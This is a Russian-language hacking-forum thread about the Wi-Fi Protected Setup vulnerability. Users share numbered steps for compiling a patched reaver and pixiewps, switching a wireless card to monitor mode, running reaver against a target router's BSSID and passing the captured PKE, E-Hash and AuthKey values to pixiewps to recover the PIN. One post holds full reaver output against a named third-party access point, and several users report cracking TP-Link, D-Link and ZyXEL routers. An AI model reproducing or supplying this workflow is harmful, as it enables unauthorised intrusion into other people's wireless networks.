Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...
     
    1. vedemur

      vedemur Member

      Joined:
      12 Nov 2012
      Messages:
      105
      Likes Received:
      9
      Reputations:
      0
      Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).
       
      1. СЕРЖ32

        СЕРЖ32 Active Member

        Joined:
        1 Sep 2013
        Messages:
        1,761
        Likes Received:
        101
        Reputations:
        0
        у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...
        Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...
         
        1. vedemur

          vedemur Member

          Joined:
          12 Nov 2012
          Messages:
          105
          Likes Received:
          9
          Reputations:
          0
          Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev
          sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.
           
          1. user100

            user100 Moderator

            Joined:
            24 Dec 2011
            Messages:
            4,730
            Likes Received:
            17,871
            Reputations:
            377
            Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.
             
            _________________________
            1. vedemur

              vedemur Member

              Joined:
              12 Nov 2012
              Messages:
              105
              Likes Received:
              9
              Reputations:
              0
              Поддерживаю, у меня тоже такое было, когда плохо пропатчил.
               
              1. СЕРЖ32

                СЕРЖ32 Active Member

                Joined:
                1 Sep 2013
                Messages:
                1,761
                Likes Received:
                101
                Reputations:
                0
                так так и делал,ну правда от инета не отключался...а так всё как по видео,т.е последовательно...
                 
                1. СЕРЖ32

                  СЕРЖ32 Active Member

                  Joined:
                  1 Sep 2013
                  Messages:
                  1,761
                  Likes Received:
                  101
                  Reputations:
                  0
                  правильно,1.5 показывает,значит пропатчил.....ну выложу скрин,как запущу всё это...
                   
                  1. СЕРЖ32

                    СЕРЖ32 Active Member

                    Joined:
                    1 Sep 2013
                    Messages:
                    1,761
                    Likes Received:
                    101
                    Reputations:
                    0
                    тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))
                     
                    1. pwr2

                      pwr2 Member

                      Joined:
                      1 Oct 2013
                      Messages:
                      182
                      Likes Received:
                      49
                      Reputations:
                      6
                      Аналогично. На тех, что у нас более менее распространены уязвимость не работает. Кто какие модели роутеров взломал?
                       
                      1. vedemur

                        vedemur Member

                        Joined:
                        12 Nov 2012
                        Messages:
                        105
                        Likes Received:
                        9
                        Reputations:
                        0
                        1. скопіювати в папку HOME папки pixiewps-master і reaver-wps-fork-read-only

                        2. підключитися до інтернету і в терміналі по черзі запустити:

                        apt-get install libpcap-dev
                        apt-get install libsqlite3-dev
                        і від'єднатися від інтернету


                        3. chmod 755 (пробіл) з відкритої папки reaver-wps-fork-read-only - src перетягнути файлик - CONFIGURE

                        4. cd (пробіл) і перетягнути папку - SRC

                        5. ./configure

                        6. make

                        7. make install і закрити термінал

                        Новий термінал

                        8. cd (пробіл) і перетягнути папку SRC з папки pixiewps-master

                        9. make

                        10. make install і закрити термінал

                        новий термінал

                        11. iwconfig - airmon-ng start wlan0 - airodump-ng mon0

                        12. reaver -i mon0 -c ? -b xxxxxx -vv -S і зупинити, коли будуть всі дані

                        13. pixiewps -e PKE -s Hash1 -z Hash2 -a Auth Key -S
                         
                        #2411 vedemur, 8 Apr 2015
                        Last edited: 8 Apr 2015
                        4Fun, pwr2 and Payer like this.
                        1. dxx258

                          dxx258 New Member

                          Joined:
                          19 Jun 2012
                          Messages:
                          4
                          Likes Received:
                          1
                          Reputations:
                          0
                          1.
                          sudo apt-get install libssl-dev
                          sudo apt-get install libpcap-dev
                          sudo apt-get install libsqlite3-dev
                          cd reaver-wps-fork-read-only/src
                          chmod 775 configure
                          ./configure
                          make
                          make install
                          2.
                          pixiewps-master/src
                          make
                          make install

                          " chmod 775 " я вводил это
                           
                          Payer likes this.
                          1. vedemur

                            vedemur Member

                            Joined:
                            12 Nov 2012
                            Messages:
                            105
                            Likes Received:
                            9
                            Reputations:
                            0
                            А это--sudo apt-get install libssl-dev-- откуда? В видео нет.
                             
                            1. dxx258

                              dxx258 New Member

                              Joined:
                              19 Jun 2012
                              Messages:
                              4
                              Likes Received:
                              1
                              Reputations:
                              0
                              из видео в описании
                               
                              1. vedemur

                                vedemur Member

                                Joined:
                                12 Nov 2012
                                Messages:
                                105
                                Likes Received:
                                9
                                Reputations:
                                0
                                Интересно, не нахожу, но учту, спасибо.
                                 
                                1. ivann

                                  ivann Member

                                  Joined:
                                  9 Mar 2014
                                  Messages:
                                  27
                                  Likes Received:
                                  5
                                  Reputations:
                                  0
                                  Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.
                                  Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.
                                   
                                  1. СЕРЖ32

                                    СЕРЖ32 Active Member

                                    Joined:
                                    1 Sep 2013
                                    Messages:
                                    1,761
                                    Likes Received:
                                    101
                                    Reputations:
                                    0
                                    так а какой должен быть мод reaver-ра по правильному,что бы работал правильно?
                                     
                                    1. ivann

                                      ivann Member

                                      Joined:
                                      9 Mar 2014
                                      Messages:
                                      27
                                      Likes Received:
                                      5
                                      Reputations:
                                      0
                                      СЕРЖ32, у tp-link, которые на 60 сек, однозначно, wps отключен.(поэтому хоть минуту, час или перезагрузка роута ни чо не даёт)
                                      reaver тот что по ссыле скачивания, а порядок его установки, более подробно, уже выше написали ((первый раз при запуске у меня тож перепор по порядку шёл)), я Kali, сейчас не пользую, поэтому пункты sudo apt-get install libssl-dev.....и т.д. не делаю.
                                       
                                      1. -bI-

                                        -bI- Member

                                        Joined:
                                        25 Aug 2012
                                        Messages:
                                        103
                                        Likes Received:
                                        11
                                        Reputations:
                                        0

                                        Когда запускаешь airmon-zc получается wlan1mon, когда airmon-ng mon0, у меня с airmon-zc нет -1 при фиксированном канале, но пропадает wlanx, до airmon-zc stop wlanx.
                                         
                                        1. СЕРЖ32

                                          СЕРЖ32 Active Member

                                          Joined:
                                          1 Sep 2013
                                          Messages:
                                          1,761
                                          Likes Received:
                                          101
                                          Reputations:
                                          0
                                          ну вот,вот какие хешы выбирать?
                                          Reaver v1.5 WiFi Protected Setup Attack Tool
                                          Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

                                          [+] Switching mon0 to channel 6
                                          [+] Waiting for beacon from A0:F3:C1:44:A7:4A
                                          [+] Associated with A0:F3:C1:44:A7:4A (ESSID: Piramida)
                                          [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
                                          [+] Trying pin 12345670.
                                          [+] Sending EAPOL START request
                                          [+] Received identity request
                                          [+] Sending identity response
                                          [P] E-Nonce: f7:87:9b:b3:a9:8b:2a:0d:2d:99:b4:e4:ca:77:72:d5
                                          [P] PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f:97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76:9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e:bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35:db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4:8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:bd:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3:1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa:42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:db:2a:12:49:c3:6a:fe:e2:f7
                                          [P] WPS Manufacturer: TP-LINK
                                          [P] WPS Model Number: 4.0
                                          [+] Received M1 message
                                          [P] AuthKey: 40:11:dd:34:20:c1:a8:4e:95:5c:f9:18:e8:46:03:dd:96:30:5f:55:8c:e2:c3:c8:23:a0:07:ea:09:42:56:b0
                                          [+] Sending M2 message
                                          [P] E-Hash1: 44:5e:8a:80:54:d2:5f:c9:4d:c9:4d:c2:16:35:2a:9a:34:c1:94:3e:94:4e:a2:aa:2a:af:ba:11:b8:d5:a6:5e
                                          [P] E-Hash2: 7f:c7:a5:23:8a:9e:c0:ba:70:14:49:97:63:27:36:58:65:2e:99:43:44:d1:c6:86:b6:01:aa:66:57:78:44:7e
                                          [+] Received M3 message
                                          [+] Sending M4 message
                                          [+] Received WSC NACK
                                          [+] Sending WSC NACK
                                          [+] p1_index set to 1
                                          [+] Pin count advanced: 1. Max pin attempts: 11000
                                          C[+] Trying pin 00005678.
                                          [+] Sending EAPOL START request
                                          [+] Received identity request
                                          [+] Sending identity response
                                          [P] E-Nonce: da:35:7b:33:f5:1d:57:82:38:19:42:24:b6:1b:26:5b
                                          [P] PKE: 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87:63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47:93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a:3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de:19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44:c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:85:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2:b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7:ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4a:c9:aa:d8:ff:0b:59:04:2f
                                          [P] WPS Manufacturer: TP-LINK
                                          [P] WPS Model Number: 4.0
                                          [+] Received M1 message
                                          [P] AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74:14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba
                                          [+] Sending M2 message
                                          C[P] E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78:33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
                                          [P] E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63:20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55
                                          [+] Received M3 message
                                          [+] Sending M4 message
                                          [+] Received WSC NACK
                                          [+] Sending WSC NACK
                                          [+] p1_index set to 2
                                          [+] Pin count advanced: 2. Max pin attempts: 11000
                                          ^C
                                          [+] Session saved.